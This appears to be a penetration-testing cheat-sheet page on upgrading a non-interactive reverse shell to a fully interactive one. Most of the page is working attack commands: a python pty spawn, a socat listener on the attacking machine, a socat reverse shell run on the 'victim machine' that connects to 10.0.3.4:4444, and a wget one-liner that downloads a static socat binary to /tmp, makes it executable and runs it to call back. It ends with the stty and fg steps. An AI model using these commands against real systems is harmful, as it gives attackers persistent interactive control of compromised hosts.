Upgrading Shells

A guide to upgrading shells from Non-interactive to interactive

Python

// python -c 'import pty; pty.spawn("/bin/bash")'
Upgrading the shell to interactive with Python

Socat

On Kali ( Attacking Machine)

socat file:`tty`,raw,echo=0 tcp-listen:4444

On Victim Machine

socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444
Using Socat to Upgrade the shell

On Victim Machine with no Socat

We will need to download a precompiled binary of socat from https://github.com/andrew-d/static-binaries we can then want to download the chosen binary into a folder that we have read and write control over

wget -q https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O /tmp/socat; chmod +x /tmp/socat; /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444

Upgrading with Magic

We can upgrade a shell with "magic" The shell will be fully interactive and have synta The first step is to get the shell while in a bash command prompt (This cannot be done is ZSH...switch the shell with /bin/bash before connecting to the shell)

then upgrade it with the python trick

Upgrade the shell with Python

We then background the shell with ctrl + z

backgrounding with ctrl z

We then issue the commands on our kali machine and make sure to take note of the values as we will need them for input on the victim machine

We then foreground with fg and then enter the commands to reset the console

resetting the termina

The commands

# In reverse shell
$ python -c 'import pty; pty.spawn("/bin/bash")'
Ctrl-Z

# In Kali
$ stty raw -echo
$ fg

# In reverse shell
$ reset
$ export SHELL=bash
$ export TERM=xterm-256color
$ stty rows <num> columns <cols>
PreviousPage 1NextTools & Usage

Last updated